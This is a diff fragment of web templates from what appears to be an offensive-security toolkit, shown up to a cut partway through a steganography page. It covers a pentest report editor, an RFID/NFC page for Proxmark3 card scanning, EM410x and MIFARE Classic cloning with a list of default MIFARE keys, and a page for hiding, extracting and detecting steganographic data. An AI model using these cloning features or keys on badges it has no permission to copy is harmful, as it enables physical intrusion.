function showCreateReport(){document.getElementById('create-form').style.display=document.getElementById('create-form').style.display==='none'?'':'none'}
|
||||
|
||||
function createReport(){
|
||||
const payload={title:document.getElementById('cr-title').value||'Untitled',
|
||||
client:document.getElementById('cr-client').value,scope:document.getElementById('cr-scope').value};
|
||||
fetch('/reports/create',{method:'POST',headers:{'Content-Type':'application/json'},body:JSON.stringify(payload)})
|
||||
.then(r=>r.json()).then(d=>{
|
||||
if(d.ok){document.getElementById('create-form').style.display='none';loadReports();openReport(d.report.id)}
|
||||
});
|
||||
}
|
||||
|
||||
function deleteReport(id){
|
||||
if(!confirm('Delete this report?')) return;
|
||||
fetch('/reports/'+id,{method:'DELETE'}).then(r=>r.json()).then(()=>loadReports());
|
||||
}
|
||||
|
||||
function openReport(id){
|
||||
currentReportId=id;
|
||||
fetch('/reports/'+id).then(r=>r.json()).then(d=>{
|
||||
if(!d.ok) return;
|
||||
const r=d.report;
|
||||
document.getElementById('editor-empty').style.display='none';
|
||||
document.getElementById('editor').style.display='';
|
||||
document.getElementById('ed-title').textContent=r.title;
|
||||
document.getElementById('ed-summary').value=r.executive_summary||'';
|
||||
document.getElementById('ed-status').value=r.status||'draft';
|
||||
renderFindings(r.findings||[]);
|
||||
switchTab('editor');
|
||||
});
|
||||
}
|
||||
|
||||
function updateReportField(field,value){
|
||||
if(!currentReportId) return;
|
||||
const data={};data[field]=value;
|
||||
fetch('/reports/'+currentReportId,{method:'PUT',headers:{'Content-Type':'application/json'},body:JSON.stringify(data)});
|
||||
}
|
||||
|
||||
function renderFindings(findings){
|
||||
const sevOrder={critical:0,high:1,medium:2,low:3,info:4};
|
||||
findings.sort((a,b)=>(sevOrder[a.severity]||5)-(sevOrder[b.severity]||5));
|
||||
// Summary
|
||||
const counts={};findings.forEach(f=>{counts[f.severity]=(counts[f.severity]||0)+1});
|
||||
const colors={critical:'#dc2626',high:'#ef4444',medium:'#f59e0b',low:'#22c55e',info:'#6366f1'};
|
||||
document.getElementById('sev-summary').innerHTML=['critical','high','medium','low','info'].map(s=>
|
||||
`<div class="sev-box" style="border-color:${colors[s]}"><strong style="color:${colors[s]};font-size:1.2rem">${counts[s]||0}</strong><br><span style="font-size:0.7rem">${s.toUpperCase()}</span></div>`).join('');
|
||||
// List
|
||||
document.getElementById('findings-list').innerHTML=findings.map((f,i)=>
|
||||
`<div class="finding-card"><div style="display:flex;justify-content:space-between;align-items:start">
|
||||
<div><h4>${i+1}. ${esc(f.title)}</h4>
|
||||
<span class="sev-badge sev-${f.severity}">${f.severity.toUpperCase()}</span>
|
||||
<span style="font-size:0.8rem;margin-left:0.5rem">CVSS: ${f.cvss||'N/A'}</span></div>
|
||||
<button class="btn btn-sm" style="color:var(--danger)" onclick="deleteFinding('${f.id}')">Remove</button>
|
||||
</div>
|
||||
<p style="font-size:0.85rem;margin:0.5rem 0">${esc(f.description||'')}</p>
|
||||
${f.impact?'<div style="font-size:0.8rem"><strong>Impact:</strong> '+esc(f.impact)+'</div>':''}
|
||||
${f.remediation?'<div style="font-size:0.8rem"><strong>Remediation:</strong> '+esc(f.remediation)+'</div>':''}
|
||||
</div>`).join('');
|
||||
}
|
||||
|
||||
function showAddFinding(){document.getElementById('add-finding-form').style.display=''}
|
||||
function showTemplateSelector(){
|
||||
fetch('/reports/templates').then(r=>r.json()).then(d=>{
|
||||
const templates=d.templates||[];
|
||||
const sel=prompt('Enter template #:\n'+templates.map((t,i)=>`${i+1}. [${t.severity.toUpperCase()}] ${t.title}`).join('\n'));
|
||||
if(!sel) return;
|
||||
const idx=parseInt(sel)-1;
|
||||
if(idx>=0&&idx<templates.length){
|
||||
const t={...templates[idx]};delete t.id;
|
||||
fetch('/reports/'+currentReportId+'/findings',{method:'POST',headers:{'Content-Type':'application/json'},body:JSON.stringify(t)})
|
||||
.then(r=>r.json()).then(()=>openReport(currentReportId));
|
||||
}
|
||||
});
|
||||
}
|
||||
|
||||
function addFinding(){
|
||||
const data={title:document.getElementById('af-title').value,
|
||||
severity:document.getElementById('af-severity').value,
|
||||
cvss:+document.getElementById('af-cvss').value,
|
||||
description:document.getElementById('af-desc').value,
|
||||
impact:document.getElementById('af-impact').value,
|
||||
remediation:document.getElementById('af-remediation').value};
|
||||
fetch('/reports/'+currentReportId+'/findings',{method:'POST',headers:{'Content-Type':'application/json'},body:JSON.stringify(data)})
|
||||
.then(r=>r.json()).then(d=>{
|
||||
if(d.ok){document.getElementById('add-finding-form').style.display='none';openReport(currentReportId)}
|
||||
});
|
||||
}
|
||||
|
||||
function deleteFinding(fid){
|
||||
if(!confirm('Remove this finding?')) return;
|
||||
fetch('/reports/'+currentReportId+'/findings/'+fid,{method:'DELETE'})
|
||||
.then(r=>r.json()).then(()=>openReport(currentReportId));
|
||||
}
|
||||
|
||||
function exportReport(fmt){
|
||||
if(!currentReportId) return;
|
||||
window.open('/reports/'+currentReportId+'/export/'+fmt,'_blank');
|
||||
}
|
||||
|
||||
function loadTemplates(){
|
||||
fetch('/reports/templates').then(r=>r.json()).then(d=>{
|
||||
document.getElementById('templates-list').innerHTML=(d.templates||[]).map(t=>
|
||||
`<div class="card" style="margin-bottom:0.5rem">
|
||||
<div style="display:flex;justify-content:space-between;align-items:center">
|
||||
<div><span class="sev-badge sev-${t.severity}">${t.severity.toUpperCase()}</span>
|
||||
<strong style="margin-left:0.5rem">${esc(t.title)}</strong>
|
||||
<span style="color:var(--text-muted);font-size:0.8rem;margin-left:0.5rem">CVSS ${t.cvss}</span></div>
|
||||
</div>
|
||||
<p style="font-size:0.8rem;margin:0.3rem 0;color:var(--text-secondary)">${esc(t.description)}</p>
|
||||
<div style="font-size:0.75rem;color:var(--text-muted)">${(t.references||[]).join(', ')}</div>
|
||||
</div>`).join('');
|
||||
});
|
||||
}
|
||||
|
||||
loadReports();
|
||||
|
||||
function esc(s){return s?String(s).replace(/&/g,'&').replace(/</g,'<').replace(/>/g,'>').replace(/"/g,'"'):''}
|
||||
</script>
|
||||
{% endblock %}
|
||||
286
web/templates/rfid_tools.html
Normal file
286
web/templates/rfid_tools.html
Normal file
@ -0,0 +1,286 @@
|
||||
{% extends "base.html" %}
|
||||
{% block title %}AUTARCH — RFID/NFC Tools{% endblock %}
|
||||
|
||||
{% block content %}
|
||||
<div class="page-header">
|
||||
<h1>RFID/NFC Tools</h1>
|
||||
<p style="margin:0;font-size:0.85rem;color:var(--text-secondary)">
|
||||
Proxmark3 interface for RFID/NFC scanning, cloning, and card management.
|
||||
</p>
|
||||
</div>
|
||||
|
||||
<!-- Tab Bar -->
|
||||
<div class="tab-bar">
|
||||
<button class="tab active" data-tab-group="rfid" data-tab="scan" onclick="showTab('rfid','scan')">Scan</button>
|
||||
<button class="tab" data-tab-group="rfid" data-tab="clone" onclick="showTab('rfid','clone')">Clone</button>
|
||||
<button class="tab" data-tab-group="rfid" data-tab="cards" onclick="showTab('rfid','cards')">Cards</button>
|
||||
</div>
|
||||
|
||||
<!-- ==================== SCAN TAB ==================== -->
|
||||
<div class="tab-content active" data-tab-group="rfid" data-tab="scan">
|
||||
|
||||
<div class="section">
|
||||
<h2>Tools Status</h2>
|
||||
<div class="stats-grid" style="grid-template-columns:repeat(auto-fit,minmax(140px,1fr))">
|
||||
<div class="stat-card">
|
||||
<div class="stat-label">Proxmark3</div>
|
||||
<div class="stat-value small">
|
||||
<span class="status-dot" id="rfid-pm3-dot"></span>
|
||||
<span id="rfid-pm3-status">Checking...</span>
|
||||
</div>
|
||||
</div>
|
||||
<div class="stat-card">
|
||||
<div class="stat-label">libnfc</div>
|
||||
<div class="stat-value small">
|
||||
<span class="status-dot" id="rfid-libnfc-dot"></span>
|
||||
<span id="rfid-libnfc-status">Checking...</span>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<div class="section">
|
||||
<h2>Scan for Cards</h2>
|
||||
<div class="tool-actions" style="margin-bottom:12px">
|
||||
<button id="btn-lf-search" class="btn btn-primary" onclick="rfidLFSearch()">LF Search (125kHz)</button>
|
||||
<button id="btn-hf-search" class="btn btn-primary" onclick="rfidHFSearch()">HF Search (13.56MHz)</button>
|
||||
<button id="btn-nfc-scan" class="btn btn-primary" onclick="rfidNFCScan()">NFC Scan</button>
|
||||
</div>
|
||||
<pre class="output-panel scrollable" id="rfid-scan-output" style="max-height:250px"></pre>
|
||||
</div>
|
||||
|
||||
<div class="section">
|
||||
<h2>Last Read Card</h2>
|
||||
<table class="data-table" style="max-width:500px">
|
||||
<tbody>
|
||||
<tr><td>Type</td><td id="rfid-last-type">--</td></tr>
|
||||
<tr><td>ID / UID</td><td id="rfid-last-id" style="font-family:monospace">--</td></tr>
|
||||
<tr><td>Frequency</td><td id="rfid-last-freq">--</td></tr>
|
||||
<tr><td>Technology</td><td id="rfid-last-tech">--</td></tr>
|
||||
</tbody>
|
||||
</table>
|
||||
</div>
|
||||
|
||||
</div>
|
||||
|
||||
<!-- ==================== CLONE TAB ==================== -->
|
||||
<div class="tab-content" data-tab-group="rfid" data-tab="clone">
|
||||
|
||||
<div class="section">
|
||||
<h2>EM410x Clone</h2>
|
||||
<p style="font-size:0.8rem;color:var(--text-muted);margin-bottom:8px">
|
||||
Clone an EM410x LF card by writing a known card ID to a T55x7 blank.
|
||||
</p>
|
||||
<div class="input-row">
|
||||
<input type="text" id="rfid-em-id" placeholder="Card ID (hex, e.g. 0102030405)" maxlength="10">
|
||||
<button id="btn-em-clone" class="btn btn-primary" onclick="rfidEMClone()">Clone EM410x</button>
|
||||
</div>
|
||||
<pre class="output-panel" id="rfid-em-output" style="min-height:0"></pre>
|
||||
</div>
|
||||
|
||||
<div class="section">
|
||||
<h2>MIFARE Classic</h2>
|
||||
<div class="tool-actions" style="margin-bottom:12px">
|
||||
<button id="btn-mf-dump" class="btn btn-primary" onclick="rfidMFDump()">Dump MIFARE Card</button>
|
||||
</div>
|
||||
<pre class="output-panel" id="rfid-mf-dump-output" style="min-height:0"></pre>
|
||||
|
||||
<h3 style="margin-top:16px">Clone from Dump</h3>
|
||||
<div class="input-row">
|
||||
<input type="text" id="rfid-mf-dump-path" placeholder="Path to dump file (e.g. /tmp/card.mfd)">
|
||||
<button id="btn-mf-clone" class="btn btn-primary" onclick="rfidMFClone()">Clone from Dump</button>
|
||||
</div>
|
||||
<pre class="output-panel" id="rfid-mf-clone-output" style="min-height:0"></pre>
|
||||
|
||||
<h3 style="margin-top:16px">Default Keys</h3>
|
||||
<div class="output-panel" id="rfid-default-keys" style="font-family:monospace;font-size:0.8rem">
|
||||
FFFFFFFFFFFF (factory default)<br>
|
||||
A0A1A2A3A4A5 (MAD key)<br>
|
||||
D3F7D3F7D3F7 (NFC NDEF)<br>
|
||||
000000000000 (null key)<br>
|
||||
B0B1B2B3B4B5 (common transport)<br>
|
||||
4D3A99C351DD (Mifare Application Directory)
|
||||
</div>
|
||||
</div>
|
||||
|
||||
</div>
|
||||
|
||||
<!-- ==================== CARDS TAB ==================== -->
|
||||
<div class="tab-content" data-tab-group="rfid" data-tab="cards">
|
||||
|
||||
<div class="section">
|
||||
<h2>Saved Cards</h2>
|
||||
<table class="data-table">
|
||||
<thead><tr><th>Name</th><th>Type</th><th>ID / UID</th><th>Saved</th><th>Action</th></tr></thead>
|
||||
<tbody id="rfid-cards-table">
|
||||
<tr><td colspan="5" class="empty-state">No saved cards yet. Scan and save cards from the Scan tab.</td></tr>
|
||||
</tbody>
|
||||
</table>
|
||||
</div>
|
||||
|
||||
<div class="section">
|
||||
<h2>Card Dumps</h2>
|
||||
<div class="tool-actions" style="margin-bottom:12px">
|
||||
<button class="btn btn-small" onclick="rfidRefreshDumps()">Refresh</button>
|
||||
</div>
|
||||
<table class="data-table">
|
||||
<thead><tr><th>Filename</th><th>Size</th><th>Date</th><th>Action</th></tr></thead>
|
||||
<tbody id="rfid-dumps-table">
|
||||
<tr><td colspan="4" class="empty-state">No dumps found.</td></tr>
|
||||
</tbody>
|
||||
</table>
|
||||
</div>
|
||||
|
||||
</div>
|
||||
|
||||
<script>
|
||||
function esc(s) { return String(s).replace(/&/g,'&').replace(/</g,'<'); }
|
||||
|
||||
/* ── Status ── */
|
||||
function rfidCheckStatus() {
|
||||
fetchJSON('/rfid/status').then(function(data) {
|
||||
var pm3Dot = document.getElementById('rfid-pm3-dot');
|
||||
var pm3Txt = document.getElementById('rfid-pm3-status');
|
||||
var nfcDot = document.getElementById('rfid-libnfc-dot');
|
||||
var nfcTxt = document.getElementById('rfid-libnfc-status');
|
||||
if (pm3Dot) pm3Dot.className = 'status-dot ' + (data.proxmark3 ? 'active' : 'inactive');
|
||||
if (pm3Txt) pm3Txt.textContent = data.proxmark3 ? 'Connected' : 'Not found';
|
||||
if (nfcDot) nfcDot.className = 'status-dot ' + (data.libnfc ? 'active' : 'inactive');
|
||||
if (nfcTxt) nfcTxt.textContent = data.libnfc ? 'Available' : 'Not installed';
|
||||
}).catch(function() {
|
||||
document.getElementById('rfid-pm3-status').textContent = 'Error';
|
||||
document.getElementById('rfid-libnfc-status').textContent = 'Error';
|
||||
});
|
||||
}
|
||||
|
||||
/* ── Scan ── */
|
||||
function rfidLFSearch() {
|
||||
var btn = document.getElementById('btn-lf-search');
|
||||
setLoading(btn, true);
|
||||
postJSON('/rfid/scan', {mode: 'lf'}).then(function(data) {
|
||||
setLoading(btn, false);
|
||||
if (data.error) { renderOutput('rfid-scan-output', 'Error: ' + data.error); return; }
|
||||
renderOutput('rfid-scan-output', data.output || 'No card detected.');
|
||||
if (data.card) rfidUpdateLastCard(data.card);
|
||||
}).catch(function() { setLoading(btn, false); });
|
||||
}
|
||||
|
||||
function rfidHFSearch() {
|
||||
var btn = document.getElementById('btn-hf-search');
|
||||
setLoading(btn, true);
|
||||
postJSON('/rfid/scan', {mode: 'hf'}).then(function(data) {
|
||||
setLoading(btn, false);
|
||||
if (data.error) { renderOutput('rfid-scan-output', 'Error: ' + data.error); return; }
|
||||
renderOutput('rfid-scan-output', data.output || 'No card detected.');
|
||||
if (data.card) rfidUpdateLastCard(data.card);
|
||||
}).catch(function() { setLoading(btn, false); });
|
||||
}
|
||||
|
||||
function rfidNFCScan() {
|
||||
var btn = document.getElementById('btn-nfc-scan');
|
||||
setLoading(btn, true);
|
||||
postJSON('/rfid/scan', {mode: 'nfc'}).then(function(data) {
|
||||
setLoading(btn, false);
|
||||
if (data.error) { renderOutput('rfid-scan-output', 'Error: ' + data.error); return; }
|
||||
renderOutput('rfid-scan-output', data.output || 'No NFC tag detected.');
|
||||
if (data.card) rfidUpdateLastCard(data.card);
|
||||
}).catch(function() { setLoading(btn, false); });
|
||||
}
|
||||
|
||||
function rfidUpdateLastCard(card) {
|
||||
document.getElementById('rfid-last-type').textContent = card.type || '--';
|
||||
document.getElementById('rfid-last-id').textContent = card.id || '--';
|
||||
document.getElementById('rfid-last-freq').textContent = card.frequency || '--';
|
||||
document.getElementById('rfid-last-tech').textContent = card.technology || '--';
|
||||
}
|
||||
|
||||
/* ── Clone ── */
|
||||
function rfidEMClone() {
|
||||
var id = document.getElementById('rfid-em-id').value.trim();
|
||||
if (!id) return;
|
||||
var btn = document.getElementById('btn-em-clone');
|
||||
setLoading(btn, true);
|
||||
postJSON('/rfid/clone/em410x', {card_id: id}).then(function(data) {
|
||||
setLoading(btn, false);
|
||||
renderOutput('rfid-em-output', data.message || data.error || 'Done');
|
||||
}).catch(function() { setLoading(btn, false); });
|
||||
}
|
||||
|
||||
function rfidMFDump() {
|
||||
var btn = document.getElementById('btn-mf-dump');
|
||||
setLoading(btn, true);
|
||||
postJSON('/rfid/dump/mifare', {}).then(function(data) {
|
||||
setLoading(btn, false);
|
||||
renderOutput('rfid-mf-dump-output', data.output || data.error || 'No output');
|
||||
}).catch(function() { setLoading(btn, false); });
|
||||
}
|
||||
|
||||
function rfidMFClone() {
|
||||
var path = document.getElementById('rfid-mf-dump-path').value.trim();
|
||||
if (!path) return;
|
||||
var btn = document.getElementById('btn-mf-clone');
|
||||
setLoading(btn, true);
|
||||
postJSON('/rfid/clone/mifare', {dump_path: path}).then(function(data) {
|
||||
setLoading(btn, false);
|
||||
renderOutput('rfid-mf-clone-output', data.message || data.error || 'Done');
|
||||
}).catch(function() { setLoading(btn, false); });
|
||||
}
|
||||
|
||||
/* ── Cards ── */
|
||||
function rfidLoadCards() {
|
||||
fetchJSON('/rfid/cards').then(function(data) {
|
||||
var tb = document.getElementById('rfid-cards-table');
|
||||
if (!data.cards || !data.cards.length) {
|
||||
tb.innerHTML = '<tr><td colspan="5" class="empty-state">No saved cards yet.</td></tr>';
|
||||
return;
|
||||
}
|
||||
var html = '';
|
||||
data.cards.forEach(function(c) {
|
||||
html += '<tr><td>' + esc(c.name) + '</td><td>' + esc(c.type) + '</td>'
|
||||
+ '<td style="font-family:monospace">' + esc(c.id) + '</td>'
|
||||
+ '<td>' + esc(c.saved_date) + '</td>'
|
||||
+ '<td><button class="btn btn-danger btn-small" onclick="rfidDeleteCard(\'' + esc(c.id) + '\')">Delete</button></td></tr>';
|
||||
});
|
||||
tb.innerHTML = html;
|
||||
});
|
||||
}
|
||||
|
||||
function rfidDeleteCard(id) {
|
||||
if (!confirm('Delete this saved card?')) return;
|
||||
postJSON('/rfid/cards/delete', {id: id}).then(function(data) {
|
||||
if (data.success) rfidLoadCards();
|
||||
});
|
||||
}
|
||||
|
||||
function rfidRefreshDumps() {
|
||||
fetchJSON('/rfid/dumps').then(function(data) {
|
||||
var tb = document.getElementById('rfid-dumps-table');
|
||||
if (!data.dumps || !data.dumps.length) {
|
||||
tb.innerHTML = '<tr><td colspan="4" class="empty-state">No dumps found.</td></tr>';
|
||||
return;
|
||||
}
|
||||
var html = '';
|
||||
data.dumps.forEach(function(d) {
|
||||
html += '<tr><td>' + esc(d.filename) + '</td><td>' + esc(d.size) + '</td>'
|
||||
+ '<td>' + esc(d.date) + '</td>'
|
||||
+ '<td><button class="btn btn-danger btn-small" onclick="rfidDeleteDump(\'' + esc(d.filename) + '\')">Delete</button></td></tr>';
|
||||
});
|
||||
tb.innerHTML = html;
|
||||
});
|
||||
}
|
||||
|
||||
function rfidDeleteDump(filename) {
|
||||
if (!confirm('Delete dump file "' + filename + '"?')) return;
|
||||
postJSON('/rfid/dumps/delete', {filename: filename}).then(function(data) {
|
||||
if (data.success) rfidRefreshDumps();
|
||||
});
|
||||
}
|
||||
|
||||
/* ── Init ── */
|
||||
document.addEventListener('DOMContentLoaded', function() {
|
||||
rfidCheckStatus();
|
||||
rfidLoadCards();
|
||||
rfidRefreshDumps();
|
||||
});
|
||||
</script>
|
||||
{% endblock %}
|
||||
431
web/templates/steganography.html
Normal file
431
web/templates/steganography.html
Normal file
@ -0,0 +1,431 @@
|
||||
{% extends "base.html" %}
|
||||
{% block title %}AUTARCH — Steganography{% endblock %}
|
||||
|
||||
{% block content %}
|
||||
<div class="page-header">
|
||||
<h1>Steganography</h1>
|
||||
<p style="margin:0;font-size:0.85rem;color:var(--text-secondary)">
|
||||
Hide data in files, extract hidden messages, and detect steganographic content.
|
||||
</p>
|
||||
</div>
|
||||
|
||||
<!-- Tab Bar -->
|
||||
<div class="tab-bar">
|
||||
<button class="tab active" data-tab-group="stego" data-tab="hide" onclick="showTab('stego','hide')">Hide</button>
|
||||
<button class="tab" data-tab-group="stego" data-tab="extract" onclick="showTab('stego','extract')">Extract</button>
|
||||
<button class="tab" data-tab-group="stego" data-tab="detect" onclick="showTab('stego','detect')">Detect</button>
|
||||
</div>
|
||||
|
||||
<!-- ==================== HIDE TAB ==================== -->
|
||||
<div class="tab-content active" data-tab-group="stego" data-tab="hide">
|
||||
|
||||
<div class="section">
|
||||
<h2>Hide Message in File</h2>
|
||||
<p style="font-size:0.8rem;color:var(--text-muted);margin-bottom:12px">
|
||||
Embed a hidden message into an image, audio, or video carrier file using LSB steganography.
|
||||
</p>
|
||||
<div class="form-row">
|
||||
<div class="form-group">
|
||||
<label>Carrier File Path</label>
|
||||
<input type="text" id="hide-carrier" placeholder="/path/to/image.png">
|
||||
</div>
|
||||
<div class="form-group">
|
||||
<label>Output File Path</label>
|
||||
<input type="text" id="hide-output" placeholder="/path/to/output.png">
|
||||
</div>
|
||||
</div>
|
||||
<div class="form-group">
|
||||
<label>Message to Hide</label>
|
||||
<textarea id="hide-message" rows="5" placeholder="Enter the secret message to embed..."></textarea>
|
||||
</div>
|
||||
<div class="form-row">
|
||||
<div class="form-group" style="max-width:250px">
|
||||
<label>Password (optional, for encryption)</label>
|
||||
<input type="password" id="hide-password" placeholder="Encryption password">
|
||||
</div>
|
||||
<div class="form-group" style="max-width:180px">
|
||||
<label>Method</label>
|
||||
<select id="hide-method">
|
||||
<option value="lsb">LSB (Least Significant Bit)</option>
|
||||
<option value="dct">DCT (JPEG)</option>
|
||||
<option value="spread">Spread Spectrum</option>
|
||||
</select>
|
||||
</div>
|
||||
</div>
|
||||
<div class="tool-actions">
|
||||
<button id="btn-hide" class="btn btn-primary" onclick="stegoHide()">Hide Message</button>
|
||||
<button class="btn btn-small" onclick="stegoCapacity()">Check Capacity</button>
|
||||
</div>
|
||||
<pre class="output-panel" id="hide-output-result"></pre>
|
||||
</div>
|
||||
|
||||
<div class="section">
|
||||
<h2>Whitespace Steganography</h2>
|
||||
<p style="font-size:0.8rem;color:var(--text-muted);margin-bottom:12px">
|
||||
Hide messages using invisible whitespace characters (tabs, spaces, zero-width chars) within text.
|
||||
</p>
|
||||
<div class="form-group">
|
||||
<label>Cover Text</label>
|
||||
<textarea id="ws-cover" rows="4" placeholder="Enter normal-looking cover text here..."></textarea>
|
||||
</div>
|
||||
<div class="form-group">
|
||||
<label>Hidden Message</label>
|
||||
<input type="text" id="ws-hidden" placeholder="Secret message to encode in whitespace">
|
||||
</div>
|
||||
<div class="tool-actions">
|
||||
<button class="btn btn-primary btn-small" onclick="wsEncode()">Encode</button>
|
||||
<button class="btn btn-small" onclick="wsDecode()">Decode</button>
|
||||
<button class="btn btn-small" onclick="wsCopy()">Copy Result</button>
|
||||
</div>
|
||||
<div class="form-group" style="margin-top:12px">
|
||||
<label>Result</label>
|
||||
<textarea id="ws-result" rows="4" readonly style="background:var(--bg-primary)"></textarea>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
</div>
|
||||
|
||||
<!-- ==================== EXTRACT TAB ==================== -->
|
||||
<div class="tab-content" data-tab-group="stego" data-tab="extract">
|
||||
|
||||
<div class="section">
|
||||
<h2>Extract Hidden Data</h2>
|
||||
<p style="font-size:0.8rem;color:var(--text-muted);margin-bottom:12px">
|
||||
Extract embedded messages from steganographic files.
|
||||
</p>
|
||||
<div class="form-row">
|
||||
<div class="form-group">
|
||||
<label>Stego File Path</label>
|
||||
<input type="text" id="extract-file" placeholder="/path/to/stego_image.png">
|
||||
</div>
|
||||
<div class="form-group" style="max-width:250px">
|
||||
<label>Password (if encrypted)</label>
|
||||
<input type="password" id="extract-password" placeholder="Decryption password">
|
||||
</div>
|
||||
</div>
|
||||
<div class="form-row">
|
||||
<div class="form-group" style="max-width:180px">
|
||||
<label>Method</label>
|
||||
<select id="extract-method">
|
||||
<option value="lsb">LSB</option>
|
||||
<option value="dct">DCT (JPEG)</option>
|
||||
<option value="spread">Spread Spectrum</option>
|
||||
<option value="auto">Auto-detect</option>
|
||||
</select>
|
||||
</div>
|
||||
<div class="form-group" style="max-width:180px">
|
||||
<label>Output Format</label>
|
||||
<select id="extract-format">
|
||||
<option value="text">Text (UTF-8)</option>
|
||||
<option value="hex">Hex Dump</option>
|
||||
<option value="raw">Raw Binary (save)</option>
|
||||
</select>
|
||||
</div>
|
||||
</div>
|
||||
<div class="tool-actions">
|
||||
<button id="btn-extract" class="btn btn-primary" onclick="stegoExtract()">Extract</button>
|
||||
</div>
|
||||
<div class="form-group" style="margin-top:12px">
|
||||
<label>Extracted Data</label>
|
||||
<div id="extract-result-wrap">
|
||||
<pre class="output-panel scrollable" id="extract-result">No extraction performed yet.</pre>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
</div>
|
||||
|
||||
<!-- ==================== DETECT TAB ==================== -->
|
||||
<div class="tab-content" data-tab-group="stego" data-tab="detect">
|
||||
|
||||
<div class="section">
|
||||
<h2>Steganalysis</h2>
|
||||
<p style="font-size:0.8rem;color:var(--text-muted);margin-bottom:12px">
|
||||
Analyze a file for signs of steganographic content using statistical methods.
|
||||
</p>
|
||||
<div class="form-row">
|
||||
<div class="form-group">
|
||||
<label>File Path to Analyze</label>
|
||||
<input type="text" id="detect-file" placeholder="/path/to/suspect_image.png">
|
||||
</div>
|
||||
</div>
|
||||
<div class="tool-actions">
|
||||
<button id="btn-detect" class="btn btn-primary" onclick="stegoDetect()">Analyze</button>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<div class="section" id="detect-results" style="display:none">
|
||||
<h2>Analysis Results</h2>
|
||||
|
||||
<!-- Verdict -->
|
||||
<div style="display:flex;gap:24px;align-items:flex-start;flex-wrap:wrap;margin-bottom:20px">
|
||||
<div class="score-display">
|
||||
<div class="score-value" id="detect-verdict" style="font-size:1.4rem">--</div>
|
||||
<div class="score-label">Verdict</div>
|
||||
</div>
|
||||
<div style="flex:1;min-width:250px">
|
||||
<div style="margin-bottom:12px">
|
||||
<label style="font-size:0.8rem;color:var(--text-secondary);display:block;margin-bottom:4px">
|
||||
Confidence Score
|
||||
</label>
|
||||
<div style="display:flex;align-items:center;gap:12px">
|
||||
<div style="flex:1;background:var(--bg-input);height:12px;border-radius:6px;overflow:hidden">
|
||||
<div id="detect-conf-bar" style="height:100%;width:0%;border-radius:6px;transition:width 0.5s"></div>
|
||||
</div>
|
||||
<span id="detect-conf-pct" style="font-weight:600;min-width:40px">0%</span>
|
||||
</div>
|
||||
</div>
|
||||
<div>
|
||||
<label style="font-size:0.8rem;color:var(--text-secondary);display:block;margin-bottom:4px">File Info</label>
|
||||
<div id="detect-file-info" style="font-size:0.85rem;color:var(--text-muted)">--</div>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<!-- Statistical Values -->
|
||||
<h3>Statistical Analysis</h3>
|
||||
<table class="data-table" style="margin-bottom:16px">
|
||||
<thead><tr><th>Test</th><th>Value</th><th>Threshold</th><th>Status</th></tr></thead>
|
||||
<tbody id="detect-stats-table">
|
||||
<tr><td colspan="4" class="empty-state">Run analysis to see results.</td></tr>
|
||||
</tbody>
|
||||
</table>
|
||||
|
||||
<!-- Indicators -->
|
||||
<h3>Indicators</h3>
|
||||
<div id="detect-indicators" style="max-height:300px;overflow-y:auto">
|
||||
<div class="empty-state">No indicators.</div>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<div class="section">
|
||||
<h2>Batch Scan</h2>
|
||||
<p style="font-size:0.8rem;color:var(--text-muted);margin-bottom:12px">
|
||||
Scan a directory of files for steganographic content.
|
||||
</p>
|
||||
<div class="form-row">
|
||||
<div class="form-group">
|
||||
<label>Directory Path</label>
|
||||
<input type="text" id="batch-dir" placeholder="/path/to/directory">
|
||||
</div>
|
||||
<div class="form-group" style="max-width:160px">
|
||||
<label>File Types</label>
|
||||
<select id="batch-types">
|
||||
<option value="images">Images (PNG/JPG/BMP)</option>
|
||||
<option value="audio">Audio (WAV/MP3/FLAC)</option>
|
||||
<option value="all">All supported</option>
|
||||
</select>
|
||||
</div>
|
||||
</div>
|
||||
<div class="tool-actions">
|
||||
<button id="btn-batch" class="btn btn-primary btn-small" onclick="stegoBatchScan()">Scan Directory</button>
|
||||
</div>
|
||||
<pre class="output-panel scrollable" id="batch-output"></pre>
|
||||
</div>
|
||||
|
||||
</div>
|
||||
|
||||
<script>
|
||||
/* ── Steganography ── */
|
||||
function esc(s) { return String(s).replace(/&/g,'&').replace(/</g,'<'); }
|
||||
|
||||
function stegoHide() {
|
||||
var carrier = document.getElementById('hide-carrier').value.trim();
|
||||
var message = document.getElementById('hide-message').value;
|
||||
var output = document.getElementById('hide-output').value.trim();
|
||||
if (!carrier || !message) { alert('Provide a carrier file path and message.'); return; }
|
||||
var btn = document.getElementById('btn-hide');
|
||||
setLoading(btn, true);
|
||||
postJSON('/stego/hide', {
|
||||
carrier: carrier,
|
||||
message: message,
|
||||
output: output,
|
||||
password: document.getElementById('hide-password').value,
|
||||
method: document.getElementById('hide-method').value
|
||||
}).then(function(data) {
|
||||
setLoading(btn, false);
|
||||
if (data.error) { renderOutput('hide-output-result', 'Error: ' + data.error); return; }
|
||||
var lines = ['Message hidden successfully.'];
|
||||
if (data.output_path) lines.push('Output: ' + data.output_path);
|
||||
if (data.bytes_hidden) lines.push('Bytes embedded: ' + data.bytes_hidden);
|
||||
if (data.capacity_used) lines.push('Capacity used: ' + data.capacity_used + '%');
|
||||
renderOutput('hide-output-result', lines.join('\n'));
|
||||
}).catch(function() { setLoading(btn, false); });
|
||||
}
|
||||
|
||||
function stegoCapacity() {
|
||||
var carrier = document.getElementById('hide-carrier').value.trim();
|
||||
if (!carrier) { alert('Enter a carrier file path first.'); return; }
|
||||
postJSON('/stego/capacity', {
|
||||
carrier: carrier,
|
||||
method: document.getElementById('hide-method').value
|
||||
}).then(function(data) {
|
||||
if (data.error) { renderOutput('hide-output-result', 'Error: ' + data.error); return; }
|
||||
var lines = ['=== Capacity Report ==='];
|
||||
lines.push('File: ' + (data.filename || carrier));
|
||||
lines.push('File size: ' + (data.file_size || '--'));
|
||||
lines.push('Max payload: ' + (data.max_bytes || '--') + ' bytes');
|
||||
lines.push('Max characters: ~' + (data.max_chars || '--'));
|
||||
if (data.dimensions) lines.push('Dimensions: ' + data.dimensions);
|
||||
renderOutput('hide-output-result', lines.join('\n'));
|
||||
});
|
||||
}
|
||||
|
||||
/* ── Whitespace Stego ── */
|
||||
function wsEncode() {
|
||||
